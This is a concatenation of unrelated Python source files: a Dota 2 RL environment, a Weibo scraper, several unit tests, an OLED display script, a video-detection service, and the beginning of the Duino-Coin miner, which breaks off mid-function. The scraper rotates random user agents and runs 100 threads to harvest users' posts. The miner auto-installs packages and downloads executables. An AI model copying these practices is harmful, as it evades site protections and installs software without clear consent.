from dota2comm import Dota2Comm
import queue
ActionMap = {
"laning": np.asarray([1, 0, 0]),
"attack": np.asarray([0, 1, 0]),
"retreat": np.asarray([0, 0, 1]),
}
#Helper function
def ParseLine(ll):
ll = ll.split(" ")
return np.asarray([float(s) for s in ll[1:24]]),float(ll[24]),ActionMap[ll[25]]
class Dota2Env():
def __init__(self, name):
self.name = name
self.dota = Dota2Comm(name)
self.StateQueue = queue.Queue()
self.OrderQueue = queue.Queue()
self.StartThreads()
def WaitDota2Msg(self):
while self.running:
msg = self.dota.receiveMessage()
if msg is not None:
self.StateQueue.put(msg)
def SendDota2Msg(self):
while self.running:
order = self.OrderQueue.get()
msg = str(np.argmax(order[0]))
self.dota.sendMessage(msg)
def StartThreads(self):
self.running = True
self.threadrecv = Thread(target=self.WaitDota2Msg)
self.threadrecv.start()
self.threadsend = Thread(target=self.SendDota2Msg)
self.threadsend.start()
def GiveOrder(self,order):
self.OrderQueue.put(order)
def GetStateRewardAction(self):
origin_str = self.StateQueue.get()
return ParseLine(origin_str)
def Step(self, order):
self.GiveOrder(order)
return self.GetStateRewardAction()
def Stop(self):
self.running = False
self.threadrecv.join()
self.threadsend.join()
|
search_by_db.py
|
from fake_useragent import UserAgent
import requests
from time import sleep
import datetime
from .model import WeiboInfo, WeiboTask, engine
from sqlalchemy.orm import sessionmaker
from pyquery import PyQuery as pq
import random
Session = sessionmaker(bind=engine)
session = Session()
ua = UserAgent(verify_ssl=False)
cookies = ""
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Accept-Language': 'zh-cn',
'Cookie': cookies,
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'}
import queue
import threading
class Weibo():
def __init__(self):
self.urlqueue = queue.Queue()
self.sec_urlqueue = queue.Queue()
self.canshu_queue = queue.Queue()
Session = sessionmaker(bind=engine)
self.session = Session()
def get_data(self,url):
sleep(1.5)
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'Cookie': cookies,
'User-Agent': ua.random}
# , proxies = proxy
print(url)
data = requests.get(url, headers=headers).text
# print(data)
return data
def parse_html(self,pl_feedlist_index, begintime,pageurl):
canshu_list=[]
for i in pl_feedlist_index.find('.card-wrap').items():
canshu = {}
card_feed = (i.find('.card-feed'))
content = card_feed.find('.content')
name = content.find('.name').text()
name_link = content.find('.name').attr('href')
txt = content.find('.txt').text()
weibo_from = content.find('.from').text()
card_act = i.find(('.card-act'))
feed_list_forward = 0
feed_list_comment = 0
feed_list_like = 0
for i in card_act.find('li').items():
# print(i.text())
if '转发' in i.text():
feed_list_forward = (i.text()).replace('转发', '')
continue
elif '评论' in i.text():
feed_list_comment = (i.text()).replace('评论', '')
continue
feed_list_like = (i.text())
if feed_list_forward == '':
feed_list_forward = 0
if feed_list_comment == '':
feed_list_comment = 0
if feed_list_like == '':
feed_list_like = 0
print(name, name_link, weibo_from, feed_list_forward, feed_list_comment, feed_list_like)
canshu['page_url'] = pageurl
canshu['name'] = name
canshu['name_link'] = name_link
canshu['weibo_from'] = weibo_from
canshu['txt'] = txt
canshu['feed_list_forward'] = feed_list_forward
canshu['feed_list_comment'] = feed_list_comment
canshu['feed_list_like'] = feed_list_like
canshu['search_time'] = begintime
canshu_list.append(canshu)
self.canshu_queue.put(canshu_list)
def req_index(self):
while True:
if self.urlqueue.qsize()%5==0:
sleep(10)
task_item=self.urlqueue.get()
url=task_item.get('url')
flag=task_item.get('flag')
id=task_item.get('id')
time=task_item.get('time')
pageurl = str(url).replace("indexpage", str(1))
data = self.get_data(pageurl)
doc = pq(data)
pl_feedlist_index = doc.find('#pl_feedlist_index')
if pl_feedlist_index.find('.card-no-result'):
self.urlqueue.task_done()
weibo_task =session.query(WeiboTask).filter_by(id=id).first()
weibo_task.flag='5'
session.commit()
continue
page=1
for i in pl_feedlist_index.find('.m-page .list .s-scroll li').items():
page = i.text().replace('第', '').replace('页', '')
print(page)
if int(page) > 0:
weibo_task = session.query(WeiboTask).filter_by(id=id).first()
weibo_task.flag = '1'
session.commit()
for page_num in range(1, int(page) + 1):
sec_url_item={}
pageurl = str(url).replace("indexpage", str(page_num))
sec_url_item['id']=id
sec_url_item['url']=pageurl
sec_url_item['time']=time
self.sec_urlqueue.put(sec_url_item)
self.urlqueue.task_done()
def seconde_run(self):
while True:
sec_task_item =self.sec_urlqueue.get()
pageurl =sec_task_item.get('url')
time =sec_task_item.get('time')
id =sec_task_item.get('id')
data = self.get_data(pageurl)
doc = pq(data)
pl_feedlist_index = doc.find('#pl_feedlist_index')
if pl_feedlist_index.find('.card-no-result'):
self.sec_urlqueue.task_done()
continue
self.parse_html(pl_feedlist_index,time,pageurl)
self.sec_urlqueue.task_done()
def insert(self):
while True:
canshu_list =self.canshu_queue.get()
for canshu in canshu_list:
weibo_info = WeiboInfo()
weibo_info.page_url = canshu.get('page_url')
weibo_info.name = canshu.get('name')
weibo_info.name_link = canshu.get('name_link')
weibo_info.weibo_from = canshu.get('weibo_from')
weibo_info.txt = canshu.get('txt')
weibo_info.feed_list_forward = canshu.get('feed_list_forward')
weibo_info.feed_list_comment = canshu.get('feed_list_comment')
weibo_info.feed_list_like = canshu.get('feed_list_like')
weibo_info.search_time = canshu.get('search_time')
self.session.add(weibo_info)
self.session.flush()
self.session.commit()
self.canshu_queue.task_done()
def run(self):
weibotask = self.session.query(WeiboTask).filter(WeiboTask.flag == '0').order_by(WeiboTask.time.desc()).all()
for i in weibotask:
task_item={}
task_item['id']=i.id
task_item['url']=i.url
task_item['flag']=i.flag
task_item['time']=i.time
self.urlqueue.put(task_item)
thread_list =[]
for i in range(1):
Treq_page = threading.Thread(target=self.req_index)
thread_list.append(Treq_page)
for i in range(100):
secTreq_page = threading.Thread(target=self.seconde_run)
thread_list.append(secTreq_page)
for i in range(1):
sqlTreq_page = threading.Thread(target=self.insert)
thread_list.append(sqlTreq_page)
for t in thread_list:
t.setDaemon(True)
t.start()
for q in [self.urlqueue,self.sec_urlqueue,self.canshu_queue]:
q.join()
if __name__ == '__main__':
weib = Weibo()
weib.run()
|
test_metadata.py
|
import multiprocessing
import threading
from queue import Queue
from localstack.utils.analytics.metadata import get_client_metadata, get_session_id
def test_get_client_metadata_cache():
c1 = get_client_metadata()
c2 = get_client_metadata()
assert c1 is not None
assert c2 is not None
assert c1 is c2
def test_get_session_id_cache_not_thread_local():
calls = Queue()
def _do_get_session_id():
calls.put(get_session_id())
threading.Thread(target=_do_get_session_id).start()
threading.Thread(target=_do_get_session_id).start()
sid1 = calls.get(timeout=2)
sid2 = calls.get(timeout=2)
assert sid1 == sid2
def test_get_session_id_cache_not_process_local():
calls = multiprocessing.Queue()
def _do_get_session_id():
calls.put(get_session_id())
try:
multiprocessing.Process(target=_do_get_session_id).start()
multiprocessing.Process(target=_do_get_session_id).start()
sid1 = calls.get(timeout=2)
sid2 = calls.get(timeout=2)
assert sid1 == sid2
except AttributeError as e:
# fix for MacOS (and potentially other systems) where local functions cannot be used for multiprocessing
if "Can't pickle local object" not in str(e):
raise
|
test_transport.py
|
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from threading import Thread
import mock
import requests
from requests import exceptions as request_exceptions
from thrift.protocol import TJSONProtocol
from thrift.server import THttpServer
from thrift.transport import TTransport
from apache.aurora.common.transport import TRequestsTransport
from gen.apache.aurora.api import ReadOnlyScheduler
from gen.apache.aurora.api.ttypes import Response, ResponseCode, ServerInfo
class ReadOnlySchedulerHandler(object):
def getRoleSummary(self): # noqa
server_info = ServerInfo(clusterName='west', thriftAPIVersion=3)
return Response(responseCode=ResponseCode.OK, serverInfo=server_info)
def test_request_transport_integration():
handler = ReadOnlySchedulerHandler()
processor = ReadOnlyScheduler.Processor(handler)
pfactory = TJSONProtocol.TJSONProtocolFactory()
server = THttpServer.THttpServer(processor, ('localhost', 0), pfactory)
server_thread = Thread(target=server.serve)
server_thread.start()
_, server_port = server.httpd.socket.getsockname()
response = None
try:
transport = TRequestsTransport('http://localhost:%d' % server_port)
protocol = TJSONProtocol.TJSONProtocol(transport)
client = ReadOnlyScheduler.Client(protocol)
response = client.getRoleSummary()
finally:
server.httpd.shutdown()
assert response is not None
assert response.responseCode == ResponseCode.OK
assert response.serverInfo.clusterName == 'west'
assert response.serverInfo.thriftAPIVersion == 3
transport.close()
def test_request_transport_timeout():
session = mock.MagicMock(spec=requests.Session)
session.headers = {}
session.post = mock.Mock(side_effect=request_exceptions.Timeout())
transport = TRequestsTransport('http://localhost:12345', session_factory=lambda: session)
protocol = TJSONProtocol.TJSONProtocol(transport)
client = ReadOnlyScheduler.Client(protocol)
try:
client.getRoleSummary()
assert False, 'getRoleSummary should not succeed'
except TTransport.TTransportException as e:
assert e.message == 'Timed out talking to http://localhost:12345'
except Exception as e:
assert False, 'Only expected TTransportException, got %s' % e
transport.close()
def test_request_any_other_exception():
session = mock.MagicMock(spec=requests.Session)
session.headers = {}
session.post = mock.Mock(side_effect=request_exceptions.ConnectionError())
transport = TRequestsTransport('http://localhost:12345', session_factory=lambda: session)
protocol = TJSONProtocol.TJSONProtocol(transport)
client = ReadOnlyScheduler.Client(protocol)
try:
client.getRoleSummary()
assert False, 'getRoleSummary should not succeed'
except TTransport.TTransportException:
pass
except Exception as e:
assert False, 'Only expected TTransportException, got %s' % e
transport.close()
|
main.py
|
import os.path
import time
import threading
import json
import click
from PIL import Image, ImageFont
from luma.core.interface.serial import i2c
from luma.oled.device import ssd1306
from luma.core.virtual import viewport
from luma.core.render import canvas
import requests
URL_BASE = 'http://10.73.224.41:5000'
URL_MISSION = '{}/mission/'.format(URL_BASE)
URL_CHALLENGE = '{}/challenge/'.format(URL_BASE)
URL_STATUS = '{}/'.format(URL_BASE)
STATUS_FACE = { 'FAILED':"serolbw_fail.png",
'CANCELED':"serolbw_fail.png",
'WINDOW_EXPIRED' : "serolbw_fail.png",
'COMPLETED' : "serolbw_thinking1.png",
'PENDING' : "serolbw_thinking6.png",
}
SECRETS_FILE = os.path.abspath(os.path.join(os.path.dirname(__file__),'secrets.json'))
THINKING = ['serolbw_thinking1.png','serolbw_thinking2.png','serolbw_thinking4.png','serolbw_thinking5.png','serolbw_thinking6.png','serolbw_thinking5.png','serolbw_thinking4.png','serolbw_thinking2.png']
serial = i2c(port=1, address=0x3C)
device = ssd1306(serial)
fontpath = os.path.abspath(os.path.join(os.path.dirname(__file__),"fonts","Affogato-Regular.ttf"))
class Looping(object):
def __init__(self):
self.isRunning = True
self.sequence = []
for img in THINKING:
img_path = os.path.abspath(os.path.join(os.path.dirname(__file__),"images", img))
logo = Image.open(img_path).convert("RGBA")
im = logo.resize(device.size)
self.sequence.append(im)
def runForever(self):
i = 0
size = len(THINKING)
while self.isRunning == True:
ia = i % size
img = self.sequence[ia]
device.display(img.convert(device.mode))
i += 1
time.sleep(0.05)
return
def show_img(img):
img_path = os.path.abspath(os.path.join(os.path.dirname(__file__),"images", img))
logo = Image.open(img_path).convert("RGBA")
im = logo.resize(device.size)
device.display(im.convert(device.mode))
time.sleep(4)
return
def show_msg(text):
font = ImageFont.truetype(fontpath, 16)
with canvas(device) as draw:
draw.rectangle(device.bounding_box, outline="white", fill="black")
draw.text((5, 10), "{}".format(text), fill="white", font=font)
time.sleep(4)
return
def boot():
font_lg = ImageFont.truetype(fontpath, 30)
font_sm = ImageFont.truetype(fontpath, 12)
with canvas(device) as draw:
draw.rectangle(device.bounding_box, outline="white", fill="black")
draw.text((30, 10), "Welcome to..", fill="white")
time.sleep(4)
with canvas(device) as draw:
draw.rectangle(device.bounding_box, outline="white", fill="black")
draw.text((35, 0), "Serol", fill="white", font=font_lg)
draw.text((20, 32), "Cosmic Explorer", fill="white", font=font_sm)
time.sleep(4)
img_path = os.path.abspath(os.path.join(os.path.dirname(__file__),"images", 'serolscreenblack.png'))
logo = Image.open(img_path).convert("RGBA")
img = logo.resize(device.size)
device.display(img.convert(device.mode))
time.sleep(4)
return
def import_settings():
with open(SECRETS_FILE) as json_data:
d = json.load(json_data)
return d
def request_status(rid):
settings = import_settings()
headers = {'Authorization': 'Token {}'.format(settings['valhalla_token'])}
resp = requests.get('https://observe.lco.global/api/userrequests/{}/'.format(rid), headers = headers)
if resp.status_code not in [200, 201]:
return 'ERROR'
msg = resp.json()['state']
return msg
def check_status():
settings = import_settings()
for rid in settings['request_ids']:
show_msg("Checking {}".format(rid))
l = Looping()
t = threading.Thread(target = l.runForever)
t.start()
resp = request_status(rid)
l.isRunning = False
show_img(STATUS_FACE[resp])
time.sleep(10)
return
@click.command()
@click.option('--update', is_flag=True)
@click.option('--splash', is_flag=True)
def runner(update, splash):
if update:
check_status()
if splash:
boot()
return
if __name__ == "__main__":
try:
runner()
except KeyboardInterrupt:
pass
|
service.py
|
"""
Main service module
"""
# pylint: disable=C0103,C0301,R0902
import threading
import datetime as dt
from videocapture import VideoCapture
from objdetector import ObjectDetector
import entities as e
class Service:
"""
Main app class with control loop
"""
def __init__(self, config, logger):
"""
Class initialization. Automatically starts event service loop thread as its last statement
config: json for instantiation of neural network and detection results sink classes
"""
self._stopEvent = False
self._detectorFree = True
self._logger = logger
self._initfromconfig(config)
self._mainthread = threading.Thread(target=self._mainLoop, name='service')
self._mainthread.start()
def _initfromconfig(self, config):
modulesconfig = config['modules']
# Video sources
self._cams = [VideoCapture(c['vsid'], c['uri'], self._logger) for c in config['cams']]
self._logger.info(f"Video sources: {[f'{c.vsid}:{c.uri}' for c in self._cams]}")
# Result subscriber
self._detectionResultSubscriber = getattr(__import__(config['resultsink']['module']), config['resultsink']['class'])(modulesconfig.get(config['resultsink']['class'], None), self._logger)
self._logger.info(f'Initialize result subscriber: {type(self._detectionResultSubscriber).__name__}')
# Neural network
nn = getattr(__import__(config['nn']['module']), config['nn']['class'])(modulesconfig.get(config['nn']['class'], None), self._logger)
self._logger.info(f'Initialize neural network: {type(nn).__name__}')
self._objDetector = ObjectDetector(nn, self._logger)
self._runinterval = config['runintervalsec']
self._logger.info(f"Service processing interval: {self._runinterval} sec")
_ = [threading.Thread(target=c.start, name=f'vsid-{c.vsid}', args=()).start() for c in self._cams]
def stop(self):
"""
stops service loop
"""
self._logger.info('Service stopping...')
self._stopEvent = True
self._objDetector.stop()
self._detectionResultSubscriber.stop()
for c in self._cams:
c.stop()
def _mainLoop(self):
ticker = threading.Event()
while not ticker.wait(self._runinterval) and not self._stopEvent:
if self._detectorFree:
self._detectionCycle()
else:
self._logger.warning('Detector is busy, skipping detection!')
self._logger.info('Service stopped')
def _detectionCycle(self):
self._detectorFree = False
for c in self._cams:
if c.isRunning:
(hasFrame, img, camid) = c.currentFrame()
if hasFrame:
frame = e.CapturedFrame(camid, dt.datetime.now(), img)
self._objDetector.pushImage(frame)
else:
c = VideoCapture(c.vsid, c.uri, self._logger)
threading.Thread(target=c.start, name=f'vsid-{c.vsid}', args=()).start()
dset = self._objDetector.getDetectedObjectsFrame()
self._detectionResultSubscriber.pushDetectedObjectsFrame(dset)
self._detectorFree = True
def join(self):
"""
waits main event loop thread to return
"""
self._mainthread.join()
|
test_gluon_model_zoo.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import mxnet as mx
from mxnet.gluon.model_zoo.vision import get_model
import sys
from common import setup_module, with_seed, teardown_module
import multiprocessing
import pytest
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
@with_seed()
@pytest.mark.parametrize('model_name', [
'resnet18_v1', 'resnet34_v1', 'resnet50_v1', 'resnet101_v1', 'resnet152_v1',
'resnet18_v2', 'resnet34_v2', 'resnet50_v2', 'resnet101_v2', 'resnet152_v2',
'vgg11', 'vgg13', 'vgg16', 'vgg19',
'vgg11_bn', 'vgg13_bn', 'vgg16_bn', 'vgg19_bn',
'alexnet', 'inceptionv3',
'densenet121', 'densenet161', 'densenet169', 'densenet201',
'squeezenet1.0', 'squeezenet1.1',
'mobilenet1.0', 'mobilenet0.75', 'mobilenet0.5', 'mobilenet0.25',
'mobilenetv2_1.0', 'mobilenetv2_0.75', 'mobilenetv2_0.5', 'mobilenetv2_0.25'
])
def test_models(model_name):
pretrained_to_test = set(['squeezenet1.1'])
test_pretrain = model_name in pretrained_to_test
model = get_model(model_name, pretrained=test_pretrain, root='model/')
data_shape = (2, 3, 224, 224) if 'inception' not in model_name else (2, 3, 299, 299)
eprint('testing forward for %s' % model_name)
print(model)
if not test_pretrain:
model.collect_params().initialize()
model(mx.nd.random.uniform(shape=data_shape)).wait_to_read()
def parallel_download(model_name):
model = get_model(model_name, pretrained=True, root='./parallel_download')
print(type(model))
@with_seed()
@pytest.mark.skip(reason='MXNet is not yet safe for forking. Tracked in #17782.')
def test_parallel_download():
processes = []
name = 'mobilenetv2_0.25'
for _ in range(10):
p = multiprocessing.Process(target=parallel_download, args=(name,))
processes.append(p)
for p in processes:
p.start()
for p in processes:
p.join()
|
PC_Miner.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Python PC Miner (v2.5)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from hashlib import sha1
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import path, system
from pathlib import Path
from platform import system as plsystem
from re import sub
from signal import SIGINT, signal
from socket import socket
from statistics import mean
from subprocess import DEVNULL, Popen, check_call
from threading import Thread as thrThread
from time import ctime, sleep, strptime, time
from multiprocessing import Lock
import pip
thread_lock = Lock()
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
execl(sys.executable, sys.executable, *sys.argv)
def now():
# Return datetime object
return datetime.now()
try:
# Check if cpuinfo is installed
import cpuinfo
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Cpuinfo is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"py-cpuinfo\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("py-cpuinfo")
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Colorama is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"colorama\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("colorama")
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Requests is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"requests\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("requests")
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Pypresence is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"pypresence\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("pypresence")
try:
# Check if xxhash is installed
import xxhash
xxhash_enabled = True
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Xxhash is not installed. "
+ "Continuing without xxhash support.")
xxhash_enabled = False
# Global variables
MINER_VER = "2.5" # Version number
SOC_TIMEOUT = 60 # Socket timeout
RESOURCES_DIR = "PCMiner_" + str(MINER_VER) + "_resources"
donatorrunning = False
debug = "n"
discord_presence = "y"
rig_identiier = "None"
requested_diff = "NET"
algorithm = "DUCO-S1"
server_ip_file = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/gh-pages/"
+ "serverip.txt") # Serverip file
config = ConfigParser()
donation_level = 0
thread = []
totalhashrate_mean = []
start_time = time()
# Create resources folder if it doesn't exist
if not path.exists(RESOURCES_DIR):
mkdir(RESOURCES_DIR)
# Check if languages file exists
if not Path(RESOURCES_DIR + "/langs.json").is_file():
url = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
r = requests.get(url)
with open(RESOURCES_DIR + "/langs.json", "wb") as f:
f.write(r.content)
# Load language file
with open(RESOURCES_DIR + "/langs.json", "r", encoding="utf8") as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if plsystem() == "Darwin":
if getlocale()[0] is None:
setlocale(LC_ALL, "en_US.UTF-8")
# Check if miner is configured, if it isn't, autodetect language
try:
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("pr"):
lang = "portugese"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("zh"):
lang = "chinese_simplified"
else:
lang = "english"
else:
# Read language variable from configfile
try:
config.read(RESOURCES_DIR + "/Miner_config.cfg")
lang = config["Duino-Coin-PC-Miner"]["language"]
except Exception:
# If it fails, fallback to english
lang = "english"
except:
lang = "english"
def getString(string_name):
# Get string form language file
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def debug_output(text):
# Debug output
if debug == "y":
print(now().strftime(Style.DIM + "%H:%M:%S.%f ") + "DEBUG: " + text)
def title(title):
# Set window title
if osname == "nt":
# Windows systems
system("title " + title)
else:
# Most standard terminals
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def handler(signal_received, frame):
# SIGINT handler
if current_process().name == "MainProcess":
prettyPrint(
"sys0",
getString("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ getString("goodbye"),
"warning")
try:
# Close previous socket connection (if any)
socket.close()
except Exception:
pass
_exit(0)
def calculate_uptime(start_time):
uptime = time() - start_time
if uptime <= 59:
return round(uptime), "seconds"
elif uptime >= 60:
return round(uptime // 60), "minutes"
elif uptime >= 3600:
return round(uptime // 3600), "hours"
# Enable signal handler
signal(SIGINT, handler)
def Greeting():
# Greeting message
global greeting
print(Style.RESET_ALL)
if requested_diff == "LOW":
diffName = getString("low_diff_short")
elif requested_diff == "MEDIUM":
diffName = getString("medium_diff_short")
else:
diffName = getString("net_diff_short")
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = getString("greeting_morning")
elif current_hour == 12:
greeting = getString("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = getString("greeting_afternoon")
elif current_hour >= 18:
greeting = getString("greeting_evening")
else:
greeting = getString("greeting_back")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Fore.YELLOW
+ Style.BRIGHT
+ getString("banner")
+ Style.RESET_ALL
+ Fore.MAGENTA
+ " (v"
+ str(MINER_VER)
+ ") "
+ Fore.RESET
+ "2019-2021")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.YELLOW
+ "https://github.com/revoxhere/duino-coin")
try:
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ "CPU: "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(threadcount)
+ "x "
+ str(cpu["brand_raw"]))
except Exception as e:
debug_output("Error displaying CPU message: " + str(e))
if osname == "nt" or osname == "posix":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("donation_level")
+ Style.BRIGHT
+ Fore.YELLOW
+ str(donation_level))
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("algorithm")
+ Style.BRIGHT
+ Fore.YELLOW
+ algorithm
+ " @ "
+ diffName)
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("rig_identifier")
+ Style.BRIGHT
+ Fore.YELLOW
+ rig_identiier)
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ str(greeting)
+ ", "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ "!\n")
if int(donation_level) > 0:
if osname == "nt":
# Initial miner executable section
if not Path(RESOURCES_DIR + "/Donate_executable.exe").is_file():
url = ("https://github.com/revoxhere/"
+ "duino-coin/blob/useful-tools/Donate_executables/"
+ "DonateExecutableWindows.exe?raw=true")
r = requests.get(url)
with open(RESOURCES_DIR + "/Donate_executable.exe", "wb") as f:
f.write(r.content)
elif osname == "posix":
# Initial miner executable section
if not Path(RESOURCES_DIR + "/Donate_executable").is_file():
url = ("https://github.com/revoxhere/"
+ "duino-coin/blob/useful-tools/Donate_executables/"
+ "DonateExecutableLinux?raw=true")
r = requests.get(url)
with open(RESOURCES_DIR + "/Donate_executable", "wb") as f:
f.write(r.content)
def loadConfig():
# Config loading section
global username
global efficiency
global donation_level
global debug
global threadcount
global requested_diff
global rig_identiier
global lang
global algorithm
# Initial configuration
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
print(
Style.BRIGHT
+ getString("basic_config_tool")
+ RESOURCES_DIR
+ getString("edit_config_file_warning"))
print(
Style.RESET_ALL
+ getString("dont_have_account")
+ Fore.YELLOW
+ getString("wallet")
+ Fore.RESET
+ getString("register_warning"))
username = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_username")
+ Fore.RESET
+ Style.BRIGHT)
if xxhash_enabled:
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - DUCO-S1 ("
+ getString("recommended")
+ ")")
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - XXHASH")
algorithm = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_algorithm")
+ Fore.RESET
+ Style.BRIGHT)
else:
algorithm = "1"
efficiency = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_intensity")
+ Fore.RESET
+ Style.BRIGHT)
threadcount = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_threads")
+ str(cpu_count())
+ "): "
+ Fore.RESET
+ Style.BRIGHT)
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - "
+ getString("low_diff"))
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - "
+ getString("medium_diff"))
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "3"
+ Style.NORMAL
+ " - "
+ getString("net_diff"))
requested_diff = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_difficulty")
+ Fore.RESET
+ Style.BRIGHT)
rig_identiier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_rig_identifier")
+ Fore.RESET
+ Style.BRIGHT)
if rig_identiier == "y" or rig_identiier == "Y":
rig_identiier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_rig_name")
+ Fore.RESET
+ Style.BRIGHT)
else:
rig_identiier = "None"
donation_level = "0"
if osname == "nt" or osname == "posix":
donation_level = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_donation_level")
+ Fore.RESET
+ Style.BRIGHT)
# Check wheter efficiency is correct
efficiency = sub(r"\D", "", efficiency)
if efficiency == "":
efficiency = 95
elif float(efficiency) > int(100):
efficiency = 100
elif float(efficiency) < int(1):
efficiency = 1
# Check wheter threadcount is correct
threadcount = sub(r"\D", "", threadcount)
if threadcount == "":
threadcount = cpu_count()
elif int(threadcount) > int(8):
threadcount = 8
print(
Style.RESET_ALL
+ Style.BRIGHT
+ getString("max_threads_notice"))
elif int(threadcount) < int(1):
threadcount = 1
# Check wheter algo setting is correct
if algorithm == "2":
algorithm = "XXHASH"
else:
algorithm = "DUCO-S1"
# Check wheter diff setting is correct
if requested_diff == "1":
requested_diff = "LOW"
elif requested_diff == "2":
requested_diff = "MEDIUM"
else:
requested_diff = "NET"
# Check wheter donation_level is correct
donation_level = sub(r"\D", "", donation_level)
if donation_level == "":
donation_level = 1
elif float(donation_level) > int(5):
donation_level = 5
elif float(donation_level) < int(0):
donation_level = 0
# Format data
config["Duino-Coin-PC-Miner"] = {
"username": username,
"efficiency": efficiency,
"threads": threadcount,
"requested_diff": requested_diff,
"donate": donation_level,
"identifier": rig_identiier,
"algorithm": algorithm,
"language": lang,
"debug": "n",
"soc_timeout": 60,
"discord_presence": "y"
}
# Write data to configfile
with open(RESOURCES_DIR + "/Miner_config.cfg", "w") as configfile:
